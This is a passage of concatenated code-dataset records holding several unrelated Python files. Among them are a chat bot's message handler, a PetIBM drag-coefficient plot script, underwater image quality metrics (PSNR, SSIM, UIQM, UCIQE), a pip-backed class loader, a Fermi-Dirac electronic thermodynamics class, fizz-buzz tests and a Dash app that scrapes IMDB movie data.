data, channel):\n print(\"calling join\")\n getattr(commands, self.config[\"join_command\"])(self, channel.replace(\"pub_\",\"\",1), data[\"username\"])\n\n def process_messages(self, data):\n channel=data[\"channel\"].replace(\"pub_\",\"\",1)\n self.process_message(data[\"sender\"][\"username\"], channel, data[\"body\"])\n\n def process_message(self, username, channel, body):\n print(\"#\"+channel+\" @\"+username+\":\\t\"+body)\n if body[0]==';':\n data=body[1:]\n args=list(data.split(\" \"))\n try:\n if args[0].startswith(\";\"):\n args.append(args[0].replace(\";\",\"\",1))\n args[0]=\"meme\"\n\n tools._check_permlevel(self, channel, username, 0)\n getattr(commands, args[0])(self, channel, username, 0, data[len(args[0])+1:], *args[1:] if len(args) else [])\n except TypeError as e:\n self.post_message(channel, str(e))\n except tools.PermissionsError as e:\n self.post_message(channel, str(e))\n except AssertionError as e:\n self.post_message(channel, str(e))\n\n def post_message(self, channel, message):\n self.ws_sendj({\"event\":\"client-message\",\"channel\":\"pub_\"+channel,\"data\":{\"body\":message}})\n\n def save_config(self):\n json.dump(self.config, open(self.config_fn,'w'), indent=4)\n\nif __name__==\"__main__\":\n try:\n FinitBot(\"config.json\").start()\n except BaseException as e:\n view_traceback(e)\n input()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"541488155","text":"\"\"\"Plot the history of the drag coefficient.\n\nCompare with the numerical results reported in Koumoutsakos & Leonard (1995).\n\n_References:_\n\n* Koumoutsakos, P., & Leonard, A. (1995).\n High-resolution simulations of the flow around an impulsively started\n cylinder using vortex methods.\n Journal of Fluid Mechanics, 296, 1-38.\n\n\"\"\"\n\nfrom matplotlib import pyplot\nimport numpy\nimport pathlib\n\nimport petibmpy\n\n\n# Set directories and parameters.\nsimudir = pathlib.Path(__file__).absolute().parents[1]\nrootdir = simudir.parents[2]\ndatadir = rootdir / 'data'\nshow_figure = True # display the Matplotlib figure\nsave_figure = True # save the Matplotlib figure as PNG\n\n# Load drag force from file and compute drag coefficient.\nfilepath = simudir / 'output' / 'forces-0.txt'\nt, fx, _ = petibmpy.read_forces(filepath)\ncd = 2 * fx\n\n# Load drag coefficient from Koumoutsakos & Leonard (1995).\nfilename = 'koumoutsakos_leonard_1995_cylinder_dragCoefficientRe550.dat'\nfilepath = datadir / filename\nt2, cd2 = petibmpy.read_forces(filepath)\nt2 *= 0.5\n\n# Plot the history of the drag coefficient.\npyplot.rc('font', family='serif', size=14)\nfig, ax = pyplot.subplots(figsize=(6.0, 4.0))\nax.set_xlabel('Non-dimensional time')\nax.set_ylabel('Drag coefficient')\nax.plot(t, cd, label='PetIBM')\nax.plot(t2, cd2, label='Koumoutsakos \\n& Leonard (1995)',\n marker='o', linewidth=0, color='black')\nax.axis((0.0, 3.0, 0.0, 2.0))\nax.legend(frameon=False)\nfig.tight_layout()\n\nif show_figure:\n pyplot.show()\n\nif save_figure:\n figdir = simudir / 'figures'\n figdir.mkdir(parents=True, exist_ok=True)\n filepath = figdir / 'drag_coefficient.png'\n fig.savefig(filepath, dpi=300, bbox_inches='tight')\n","sub_path":"examples/decoupledibpm/cylinder2dRe550/scripts/plot_drag_coefficient.py","file_name":"plot_drag_coefficient.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"183458440","text":"'''\nMetrics for unferwater image quality evaluation.\n\nAuthor: Xuelei Chen \nEmail: chenxuelei@hotmail.com\n\nUsage:\npython evaluate.py RESULT_PATH REFERENCE_PATH\n'''\nimport numpy as np\nfrom skimage.measure import compare_psnr, compare_ssim\nimport math\nimport sys\nfrom skimage import io, color, filters\nimport os\nimport math\n\ndef rmetrics(a,b):\n \n #pnsr\n mse = np.mean((a-b)**2)\n psnr = 10*math.log10(1/mse)\n\n #ssim\n ssim = compare_ssim(a,b,multichannel=True)\n\n return psnr, ssim\n\ndef nmetrics(a):\n rgb = a\n lab = color.rgb2lab(a)\n gray = color.rgb2gray(a)\n # UCIQE\n c1 = 0.4680\n c2 = 0.2745\n c3 = 0.2576\n l = lab[:,:,0]\n\n #1st term\n chroma = (lab[:,:,1]**2 + lab[:,:,2]**2)**0.5\n uc = np.mean(chroma)\n sc = (np.mean((chroma - uc)**2))**0.5\n\n #2nd term\n top = np.int(np.round(0.01*l.shape[0]*l.shape[1]))\n sl = np.sort(l,axis=None)\n isl = sl[::-1]\n conl = np.mean(isl[::top])-np.mean(sl[::top])\n\n #3rd term\n satur = []\n chroma1 = chroma.flatten()\n l1 = l.flatten()\n for i in range(len(l1)):\n if chroma1[i] == 0: satur.append(0)\n elif l1[i] == 0: satur.append(0)\n else: satur.append(chroma1[i] / l1[i])\n\n us = np.mean(satur)\n\n uciqe = c1 * sc + c2 * conl + c3 * us\n\n # UIQM\n p1 = 0.0282\n p2 = 0.2953\n p3 = 3.5753\n\n #1st term UICM\n rg = rgb[:,:,0] - rgb[:,:,1]\n yb = (rgb[:,:,0] + rgb[:,:,1]) / 2 - rgb[:,:,2]\n rgl = np.sort(rg,axis=None)\n ybl = np.sort(yb,axis=None)\n al1 = 0.1\n al2 = 0.1\n T1 = np.int(al1 * len(rgl))\n T2 = np.int(al2 * len(rgl))\n rgl_tr = rgl[T1:-T2]\n ybl_tr = ybl[T1:-T2]\n\n urg = np.mean(rgl_tr)\n s2rg = np.mean((rgl_tr - urg) ** 2)\n uyb = np.mean(ybl_tr)\n s2yb = np.mean((ybl_tr- uyb) ** 2)\n\n uicm =-0.0268 * np.sqrt(urg**2 + uyb**2) + 0.1586 * np.sqrt(s2rg + s2yb)\n\n #2nd term UISM (k1k2=8x8)\n Rsobel = rgb[:,:,0] * filters.sobel(rgb[:,:,0])\n Gsobel = rgb[:,:,1] * filters.sobel(rgb[:,:,1])\n Bsobel = rgb[:,:,2] * filters.sobel(rgb[:,:,2])\n\n Rsobel=np.round(Rsobel).astype(np.uint8)\n Gsobel=np.round(Gsobel).astype(np.uint8)\n Bsobel=np.round(Bsobel).astype(np.uint8)\n\n Reme = eme(Rsobel)\n Geme = eme(Gsobel)\n Beme = eme(Bsobel)\n\n uism = 0.299 * Reme + 0.587 * Geme + 0.114 * Beme\n\n #3rd term UIConM\n uiconm = logamee(gray)\n\n uiqm = p1 * uicm + p2 * uism + p3 * uiconm\n return uiqm,uciqe\n\ndef eme(ch,blocksize=8):\n\n num_x = math.ceil(ch.shape[0] / blocksize)\n num_y = math.ceil(ch.shape[1] / blocksize)\n \n eme = 0\n w = 2. / (num_x * num_y)\n for i in range(num_x):\n\n xlb = i * blocksize\n if i < num_x - 1:\n xrb = (i+1) * blocksize\n else:\n xrb = ch.shape[0]\n\n for j in range(num_y):\n\n ylb = j * blocksize\n if j < num_y - 1:\n yrb = (j+1) * blocksize\n else:\n yrb = ch.shape[1]\n \n block = ch[xlb:xrb,ylb:yrb]\n\n blockmin = np.float(np.min(block))\n blockmax = np.float(np.max(block))\n\n # # old version\n # if blockmin == 0.0: eme += 0\n # elif blockmax == 0.0: eme += 0\n # else: eme += w * math.log(blockmax / blockmin)\n\n # new version\n if blockmin == 0: blockmin+=1\n if blockmax == 0: blockmax+=1\n eme += w * math.log(blockmax / blockmin)\n return eme\n\ndef plipsum(i,j,gamma=1026):\n return i + j - i * j / gamma\n\ndef plipsub(i,j,k=1026):\n return k * (i - j) / (k - j)\n\ndef plipmult(c,j,gamma=1026):\n return gamma - gamma * (1 - j / gamma)**c\n\ndef logamee(ch,blocksize=8):\n\n num_x = math.ceil(ch.shape[0] / blocksize)\n num_y = math.ceil(ch.shape[1] / blocksize)\n \n s = 0\n w = 1. / (num_x * num_y)\n for i in range(num_x):\n\n xlb = i * blocksize\n if i < num_x - 1:\n xrb = (i+1) * blocksize\n else:\n xrb = ch.shape[0]\n\n for j in range(num_y):\n\n ylb = j * blocksize\n if j < num_y - 1:\n yrb = (j+1) * blocksize\n else:\n yrb = ch.shape[1]\n \n block = ch[xlb:xrb,ylb:yrb]\n blockmin = np.float(np.min(block))\n blockmax = np.float(np.max(block))\n\n top = plipsub(blockmax,blockmin)\n bottom = plipsum(blockmax,blockmin)\n\n m = top/bottom\n if m ==0.:\n s+=0\n else:\n s += (m) * np.log(m)\n\n return plipmult(w,s)\n\ndef main():\n result_path = sys.argv[1]\n reference_path = sys.argv[2]\n\n result_dirs = os.listdir(result_path)\n # reference_dirs = os.listdir(reference_path)\n\n sumpsnr, sumssim, sumuiqm, sumuciqe = 0.,0.,0.,0.\n\n N=0\n for imgdir in result_dirs:\n if '.png' in imgdir:\n #corrected image\n corrected = io.imread(os.path.join(result_path,imgdir))\n\n #reference image\n imgname = imgdir.split('corrected')[0]\n refdir = imgname+'.png'\n reference = io.imread(os.path.join(reference_path,refdir))\n\n psnr,ssim = rmetrics(corrected,reference)\n\n uiqm,uciqe = nmetrics(corrected)\n\n sumpsnr += psnr\n sumssim += ssim\n sumuiqm += uiqm\n sumuciqe += uciqe\n N +=1\n\n with open(os.path.join(result_path,'metrics.txt'), 'a') as f:\n f.write('{}: psnr={} ssim={} uiqm={} uciqe={}\\n'.format(imgname,psnr,ssim,uiqm,uciqe))\n\n mpsnr = sumpsnr/N\n mssim = sumssim/N\n muiqm = sumuiqm/N\n muciqe = sumuciqe/N\n\n with open(os.path.join(result_path,'metrics.txt'), 'a') as f:\n f.write('Average: psnr={} ssim={} uiqm={} uciqe={}\\n'.format(mpsnr, mssim, muiqm, muciqe))\n\nif __name__ == '__main__':\n main()","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"111985426","text":"import inspect\nimport pkg_resources\nfrom .compat import import_module\nfrom .pip_manager import PackageNotFound\n\n\nclass ClassLoaderException(Exception):\n pass\n\n\nclass ClassLoader(object):\n \"\"\"\n this is a helper class to help load class objects.\n (buildout recipes and isotopes)\n\n it will attempt to retrieve eggs on the fly to satisfy\n requirements.\n \"\"\"\n\n def __init__(self, pip_manager):\n self._pip = pip_manager\n\n def get_entry_point(self, entry_point, group):\n if \":\" in entry_point:\n dist, name = entry_point.split(\":\")\n else:\n dist, name = entry_point, \"default\"\n\n try:\n import_module(dist)\n except ImportError:\n self._install_egg(dist)\n\n return pkg_resources.load_entry_point(\n dist, group, name\n )\n\n def get_class(self, class_module_path):\n \"\"\"\n get the first class found from a module.\n\n this is how uranium finds the class itself.\n \"\"\"\n module = self.get_module(class_module_path)\n\n classes = _get_classes_from_module(module)\n\n if len(classes) == 0:\n raise ClassLoaderException(\n \"module {0}\".format(module) +\n \" does not have a class!\"\n )\n\n return classes[0]\n\n def get_module(self, module_path):\n # look for module\n # if it doesn't exist, download from pip\n # return module or raise exception?\n try:\n return import_module(module_path)\n except ImportError:\n try:\n self._install_egg(module_path)\n return import_module(module_path)\n except (PackageNotFound, ImportError):\n raise ClassLoaderException(\n \"unable to find module or python package \"\n \"{0}\".format(module_path)\n )\n\n def _install_egg(self, egg_name):\n try:\n self._pip.add_eggs({egg_name: None})\n self._pip.install()\n except (PackageNotFound, ImportError):\n raise ClassLoaderException(\n \"unable to install egg {0}\".format(egg_name)\n )\n\n\ndef _get_classes_from_module(module):\n member_dict = dict(inspect.getmembers(module))\n\n def is_class_from_module(cls):\n return inspect.isclass(cls) and inspect.getmodule(cls) == module\n\n return [v for v in member_dict.values() if is_class_from_module(v)]\n","sub_path":"uranium/classloader.py","file_name":"classloader.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"503706335","text":"# -*- coding: UTF-8 -*-\r\nimport json\r\n\r\nwith open('./case.json','r',encoding = 'utf-8')as f:\r\n json_list = json.load(f)\r\n # 二维数组生成\r\n # for i in json_list:\r\n # print(type(i['name']))\r\n # i['prerequisites'].encode('utf-8')\r\n # nameCaseList = set([case['name'] for case in json_list])\r\n # prerequisitesList = set([case['prerequisites'] for case in json_list])\r\n # for i in nameCaseList:\r\n # print(i)\r\n # print(prerequisitesList)\r\n exam = open(\"./uml/example.uml\",\"w+\",encoding = 'utf-8')\r\n exam.write(\"@startuml\\n\")\r\n exam.write(\":普通用户: as user\\n\")\r\n for i in json_list:\r\n exam.write(\"(\"+i['name']+\")\\n\")\r\n for j in json_list:\r\n if j['prerequisites'] != []:\r\n for i in j['prerequisites']:\r\n exam.write(\"(\"+j['name']+\")\"+\"--|>\"+\"(\"+i+\")\\n\")\r\n else:\r\n exam.write(\"user\"+\"->\"+\"(\"+j['name']+\")\"+\"\\n\")\r\n exam.write(\"@enduml\\n\")\r\n exam.close()\r\n","sub_path":"requirments/source/userOriented/AutoCaseDiagram.py","file_name":"AutoCaseDiagram.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"427342136","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport numpy as np\nfrom scipy.constants import physical_constants\nfrom scipy.integrate import simps\nfrom scipy.optimize import brentq\nfrom . import fermi_dirac_distribution\n\nk_b = physical_constants['Boltzmann constant in eV/K'][0]\n\n\ndef s(f):\n return -(np.log(f ** f) + np.log((1.0 - f) ** (1.0 - f)))\n\n\nclass FixedDOSApproximation(object):\n \"\"\"\n\n Attributes\n ----------\n chemical_potentials : 1d array.\n Chemical potentials at the given temperatures (eV).\n\n Notes\n -----\n In [X. Zhang et al., Phys. Rev. B 95, 165126 (2017)], the Fermi energy\n is fixed also at finite temperatures. This, however, becomes not robust\n against an origin shift of energy \\epsilon -> \\epsilon + \\epsilon_0\n because\n .. math ::\n\n \\epsilon_0 \\int_{-\\infty}^{\\infty} D(\\epsilon)\n (f(\\epsilon) - f_0(\\epsilon)) d\\epsilon \\neq 0\n\n This actually means the fixed-Fermi-energy scheme is not robust against\n an origin shift of energy. To address this issue, this class computes\n first chemical potential for each temperature to be sure that the number\n of (partial) occupied states is the same as that at 0 K, and then compute\n other thermodynamic properties considering the chemical potential at\n finite temperature.\n\n If we give delta energies not enough small, the numerical integral for\n thermodynamic properties are not enough accurate particularly at low\n temperatures and deviated from the results of the Sommerfeld approximation.\n \"\"\"\n def __init__(self, temperatures, energies, dos, fermi_energy,\n near_fermi=True, edelta=0.001):\n \"\"\"\n\n Parameters\n ----------\n temperatures : 1d array.\n Temperature (K).\n energies : (nedos) 1d array.\n Energies corresponding to DOS (eV).\n dos : (nedos) 1d array.\n DOS (eV^-1).\n fermi_energy : float, optional\n Fermi energy (eV).\n near_fermi : bool, optional\n Whether to consider only near the Fermi energy. This may be helpful\n to reduce the unnecessary computations while keeping a good\n accuracy particularly at low temperatures.\n edelta : float, optional\n Delta energy for evaluation (eV). Valid only when near_fermi\n is True. The default value may be suitable for typical temperature\n range of hundreds up to few thousands Kelvin.\n \"\"\"\n self.temperatures = np.atleast_1d(temperatures)\n if near_fermi:\n self.energies, self.dos = self._calculate_energy_and_dos(\n temperatures, energies, dos, fermi_energy, edelta)\n else:\n self.energies = energies.copy()\n self.dos = dos.copy()\n\n self.fermi_energy = fermi_energy\n self.number_occupied = self.calculate_number_occupied(\n temperature=0.0, mu=self.fermi_energy)\n\n self.chemical_potentials = np.full_like(self.temperatures, np.nan)\n self.numbers = np.full_like(self.temperatures, np.nan)\n self.internal_energies = np.full_like(self.temperatures, np.nan)\n self.entropies = np.full_like(self.temperatures, np.nan)\n self.helmholtz_energies = np.full_like(self.temperatures, np.nan)\n\n @staticmethod\n def _calculate_energy_and_dos(\n temperatures, energies, dos, fermi_energy, edelta):\n \"\"\"Calculate energy and dos for thermodynamic properties.\"\"\"\n # # Energy window.\n # # Outside this, the Fermi-Dirac distribution is just 0.0 or 1.0.\n width = k_b * np.max(temperatures) * 40.0\n emin = fermi_energy - width\n emax = fermi_energy + width\n\n energies_new = np.arange(emin, emax, edelta)\n dos_new = np.interp(energies_new, energies, dos, left=0.0, right=0.0)\n return energies_new, dos_new\n\n def run(self):\n mu0, n0, u0, entropy0 = self._run_temperature(0.0)\n\n for i, t in enumerate(self.temperatures):\n mu, n, u, entropy = self._run_temperature(t)\n\n self.chemical_potentials[i] = mu\n self.numbers[i] = n\n self.internal_energies[i] = u\n self.entropies[i] = entropy\n\n self.internal_energies -= u0\n\n self.helmholtz_energies = self.calculate_helmholtz_energy()\n\n def _run_temperature(self, temperature):\n energies = self.energies\n dos = self.dos\n\n mu = self.calculate_chemical_potential(\n temperature=temperature,\n number_occupied=self.number_occupied,\n energies=energies,\n )\n fd = fermi_dirac_distribution(temperature, mu, energies)\n\n n = self.calculate_n_from_fermi_dirac(fd, energies, dos)\n u = self.calculate_u_from_fermi_dirac(fd, energies, dos)\n entropy = self.calculate_s_from_fermi_dirac(fd, energies, dos)\n\n return mu, n, u, entropy\n\n def calculate_chemical_potential(self, temperature, number_occupied, energies):\n def func(x):\n n = self.calculate_number_occupied(temperature, x)\n return n - number_occupied\n\n a = np.min(energies)\n b = np.max(energies)\n mu, r = brentq(func, a, b, xtol=1e-16, full_output=True)\n\n if not r.converged:\n raise ValueError\n\n return mu\n\n def calculate_number_occupied(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_n_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_n_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate number of particles.\"\"\"\n return simps(dos * fd, energies)\n\n def calculate_internal_energy(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_u_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_u_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate internal energy.\"\"\"\n return simps(dos * fd * energies, energies)\n\n def calculate_entropy(self, temperature, mu):\n fd = fermi_dirac_distribution(temperature, mu, self.energies)\n return self.calculate_s_from_fermi_dirac(fd, self.energies, self.dos)\n\n @staticmethod\n def calculate_s_from_fermi_dirac(fd, energies, dos):\n \"\"\"Calculate entropy.\"\"\"\n return k_b * simps(dos * s(fd), energies)\n\n def calculate_helmholtz_energy(self):\n return self.internal_energies - self.temperatures * self.entropies\n\n @staticmethod\n def from_dos_object(dos_object, temperatures, *args, **kwargs):\n return FixedDOSApproximation(\n temperatures=temperatures,\n energies=dos_object.energies,\n dos=dos_object.dos.sum(axis=0),\n fermi_energy=dos_object.fermi_energy,\n *args,\n **kwargs)\n","sub_path":"cmtools/electronic/fixed_dos_approximation.py","file_name":"fixed_dos_approximation.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"633926936","text":"\"\"\"\n==============\ntest_fizz_buzz\n==============\n\nTest fizz_buzz solution.\n\n:Author: Ricardo Lima \n:Copyright: © 2016 Ricardo José Pontes Lima Filho. All rights reserved.\n:License: BSD—see LICENSE file for more details.\n:Version: 0.1.0\n\"\"\"\n\nfrom codeevalsolutions.fizz_buzz import custom_fizz_buzz, main\n\n\nclass TestFizzBuzz:\n def test_1(self):\n assert custom_fizz_buzz(3, 5, 10) == '1 2 F 4 B F 7 8 F B'\n\n def test_2(self):\n assert custom_fizz_buzz(2, 7, 15) == ('1 F 3 F 5 F B F 9 F 11 F 13 '\n 'FB 15')\n\n def test_3(self):\n assert custom_fizz_buzz(5, 11, 35) == (\n '1 2 3 4 F 6 7 8 9 F B 12 13 14 F 16 17 18 19 F 21 B 23 24 F 26 '\n '27 28 29 F 31 32 B 34 F')\n\n\nclass TestMain:\n def test_1(self, tmpdir, capsys):\n text = '3 5 10\\n2 7 15\\n5 11 35\\n'\n output = ('1 2 F 4 B F 7 8 F B\\n'\n '1 F 3 F 5 F B F 9 F 11 F 13 FB 15\\n'\n '1 2 3 4 F 6 7 8 9 F B 12 13 14 F 16 17 18 19 F 21 B 23 24 '\n 'F 26 27 28 29 F 31 32 B 34 F\\n')\n f = tmpdir.mkdir('tmp').join('input.txt')\n f.write(text)\n main([str(f)])\n out, err = capsys.readouterr()\n assert out == output\n","sub_path":"tests/test_fizz_buzz.py","file_name":"test_fizz_buzz.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219145850","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[139]:\nimport dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport base64\nimport pandas as pd\nfrom bs4 import BeautifulSoup \nimport requests\n\n# In[141]:\n\napp = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP],\n meta_tags=[\n {\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=0.55\"}]\n )\n\n#####------------------Controls Starts Here-------------------------######\n# Colors\nbanner_color = 'black'\ntitle_font_color = 'black'\nfont_color = '#FFFFFF'\nbackground_color = 'E3E2DC'\ntile_color = '#333333'\n\n# Controls\ncontrols = dbc.Card(\n [\n dbc.Row(\n [\n dbc.Col(\n [\n dbc.Label(\"Enter Movie Name: \"),\n html.Div([\n dcc.Input(id='my_input', value='Star Wars: Episode IX - The Rise of Skywalker', \n placeholder = 'Search Movie', type='text', style = {'width':'100%'})]),\n ],\n xs=12, sm=12, md=12, lg=4, xl=4,\n ),\n dbc.Col(\n [\n dbc.Button(\"Search for the Movie\", color=\"primary\", id=\"sbumit_buttom\")\n ],\n xs=12, sm=12, md=12, lg=2, xl=2,\n style = {\"margin-top\": \"10px\", 'margin-left':'20px',}\n )\n \n ],\n justify=\"start\"\n )\n \n ],\n body=True, \n style={'display': 'inline-block',\n 'min-height':'100%',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-bottom': '10px',\n 'textAlign' : 'left',\n 'top': '0px',\n 'align-self': 'auto',\n 'position': 'sticky',\n 'zIndex': 999,\n 'color':font_color\n }\n)\n\n#####------------------app layout Starts Here-------------------------######\n\n# logo image\nimage_filename = 'IMDB_logo.png'\nencoded_image = base64.b64encode(open(image_filename, 'rb').read()).decode('ascii')\n\n\napp.layout = dbc.Container( \n [ \n dbc.Row([\n dbc.Col(\n html.Img(\n src='data:image/png;base64,{}'.format(encoded_image),\n id=\"logo-image\",\n style={\n \"height\": \"70px\",\n \"width\": \"auto\",\n \"margin-top\": \"3px\",\n 'textAlign' : 'left',\n 'display': 'inline-block'}),\n xs=12, sm=12, md=12, lg=3, xl=3,\n ),\n dbc.Col([\n html.H1(\"Movie Searcher\", \n style = {'textAlign' : 'Center',\n \"margin-top\": \"0px\", \n 'color': title_font_color}),\n html.H6('Search for Movie Information.',\n style={'textAlign' : 'Center',\n 'width' :'flex',\n 'font-size' : '12px', \n 'color': title_font_color}),\n ], xs=12, sm=12, md=12, lg=6, xl=6,\n ),\n dbc.Col(\n html.A(\n html.Button(\"IMDB.COM\", id=\"learn-more-button\"),\n href=\"https://www.imdb.com/\",\n style={'display': 'inline-block',\n \"margin-top\": \"20px\", 'width' : '100%', \n 'textAlign' : 'right'}\n ), xs=12, sm=12, md=12, lg=3, xl=3,\n ),\n ],\n style= {\"backgroundColor\" : background_color}\n ),\n dbc.Row(controls),\n html.Hr(),\n dbc.Row([dbc.Spinner(html.Div(id=\"alert_dash\"), color=\"light\")], \n style={'textAlign' : 'right'},\n ),\n dbc.Row(\n [\n dbc.Col(\n \n [\n dbc.Spinner(html.Div(id=\"alert_msg\"), color=\"light\"),\n dbc.CardImg(id=\"picture\", top=True)],xs=10, sm=10, md=10, lg=5, xl=5,\n style={'display': 'inline-block', \n #'width': 'flex',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-right': '10px',\n 'margin-top': '10px',\n }\n ),\n dbc.Col(\n [\n dbc.Row(\n dbc.Col([\n html.Br(),\n dbc.Row(html.H2(id='my-title',style={\"color\": 'white'})),\n html.Br(),\n html.Br(),\n html.Br(),\n dbc.Row(html.H4(id='my-rating',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-genre',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-cast',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-duration',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-parental_rating',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-release_date',style={\"color\": 'white'})),\n dbc.Row(html.H4(id='my-director',style={\"color\": 'white'}))\n \n \n ],style ={'margin-left': '50px'}),\n \n \n ),\n ], xs=10, sm=10, md=10, lg=5, xl=5,\n style={'display': 'inline-block', \n #'width': 'flex',\n 'border-radius': '5px',\n #'box-shadow': '8px 8px 8px grey',\n 'background-color': tile_color,\n 'padding': '10px',\n 'margin-right': '10px',\n 'margin-top': '10px',\n },\n )\n ],\n justify=\"center\"\n ),\n \n ],\n fluid=True, style={'background-color':background_color}#'display': 'block'}\n)\n\n# In[]\n####Helper Function\n# finding selectors \nmovie_title_selector = 'h1'\nmovie_genre_selector = '.subtext a'\nmovie_cast_selector = '#titleCast .loadlate'\nmovie_poster_selector = '.poster img'\nmovie_rating_selector = '.ratingValue span'\nurl = 'https://www.imdb.com/title/tt1185834/'\nheaders = {\"Accept-Language\": \"en-US,en;q=0.5\"} # making sure the language scraped will be set in English\nresponse = requests.get(url, headers = headers)\nhtml_str = response.text\nsoup = BeautifulSoup(html_str)\n\nmovie_title = soup.select(movie_title_selector)[0].text.replace('\\xa0', \" \")\n#print(movie_title)\n# getting movie_genre\nmovie_genre = [i.text for i in soup.select(movie_genre_selector)][:-1]\n#print(movie_genre)\n# getting movie_cast\nmovie_cast = [i.get('alt') for i in soup.select(movie_cast_selector)]\n#print(movie_cast)\n# getting movie_poster\nmovie_poster = soup.select(movie_poster_selector)[0].get('src')\n#print(movie_poster)\n# getting movie_rating\nmovie_rating = float(soup.select(movie_rating_selector)[0].text)\n#print(movie_rating)\n\n\nmovie_time = soup.find_all('div', attrs = {'class':'subtext'})[0].find_all('time')[0].text.strip()\nmovie_parental_rating = soup.find_all('div', attrs = {'class':'subtext'})[0].text.strip().split('\\n')[0]\nmovie_release_date = soup.find_all('div', attrs = {'class':'subtext'})[0].find_all('a')[-1].text.strip().replace(' (USA)', '')\nmovie_director = soup.find_all('div', attrs = {'class' : 'credit_summary_item'})[0].find_all('a')[0].text\n\n\nfields_we_are_scaping = [\"Movie Title\", \"Movie Poster Link\", \"Rating\", \"Genre\", \"Cast\", \"Duration\", \n \"Parental Rating\", \"Release Date\", \"Director\"] # creating fields that we are going to scraped\nscraped_data = {keys:[] for keys in fields_we_are_scaping} # convert field to dict format\n\ndef get_movie_data_using_title(movie):\n scraped_data = {keys:[] for keys in fields_we_are_scaping} # clean up scraped data from previous search\n movie_title_selector = 'h1'\n movie_genre_selector = '.subtext a'\n movie_cast_selector = '#titleCast .loadlate'\n movie_poster_selector = '.poster img'\n movie_rating_selector = '.ratingValue span'\n #request finding data\n scraped_url_list = []\n headers = {\"Accept-Language\": \"en-US,en;q=0.5\"}\n params = {'q': movie, 's' : 'tt', 'ttype' : 'ft', 'ref' : 'fn_ft'} # q is our search input parameters\n response = requests.get('https://www.imdb.com/find', params = params, headers = headers)\n html_str = response.text\n soup = BeautifulSoup(html_str)\n search_result = soup.select('.result_text > a')\n for result in search_result:\n movie_url = 'https://www.imdb.com' + result.get('href') # combining the movies url with domain url\n scraped_url_list.append(movie_url)\n \n #request movie data from movie url\n for i, movie_url in enumerate (scraped_url_list[:1], start = 1): # only run ten search result, often times search result after the tenth is not relevant to our search\n headers = {\"Accept-Language\": \"en-US,en;q=0.5\"}\n response_movie = requests.get(movie_url, headers = headers)\n html_movie_str = response_movie.text\n soup_movie = BeautifulSoup(html_movie_str)\n # parsing data\n movie_title = soup_movie.select(movie_title_selector)[0].text.replace('\\xa0', \" \")\n #print('Working on {}'.format(movie_url),'Movie: {}'.format(movie_title), i,'/', 10)\n\n try:\n movie_poster = soup_movie.select(movie_poster_selector)[0].get('src')\n except:\n movie_poster = 'NA'\n try:\n movie_rating = float(soup_movie.select(movie_rating_selector)[0].text)\n except:\n movie_rating = 'NA'\n movie_genre = [i.text for i in soup_movie.select(movie_genre_selector)][:-1]\n movie_cast = [i.get('alt') for i in soup_movie.select(movie_cast_selector)]\n \n movie_time = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].find_all('time')[0].text.strip()\n movie_parental_rating = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].text.strip().split('\\n')[0]\n movie_release_date = soup_movie.find_all('div', attrs = {'class':'subtext'})[0].find_all('a')[-1].text.strip().replace(' (USA)', '')\n movie_director = soup_movie.find_all('div', attrs = {'class' : 'credit_summary_item'})[0].find_all('a')[0].text\n\n\n #appending all data to scraped data\n scraped_data['Movie Title'].append(movie_title)\n scraped_data['Movie Poster Link'].append(movie_poster)\n scraped_data['Rating'].append(movie_rating)\n scraped_data['Genre'].append(movie_genre)\n scraped_data['Cast'].append(movie_cast)\n scraped_data['Duration'].append(movie_time)\n scraped_data['Parental Rating'].append(movie_parental_rating)\n scraped_data['Release Date'].append(movie_release_date)\n scraped_data['Director'].append(movie_director)\n\n return pd.DataFrame(scraped_data)\n\ndf = get_movie_data_using_title('Stars war')\n\n# In[]\n\n\n#####------------------Function Starts Here-------------------------######\n@app.callback(\n [Output(component_id = 'alert_msg', component_property = 'children'),\n Output(component_id = 'picture', component_property = 'src'),],\n Input(component_id = 'sbumit_buttom', component_property = 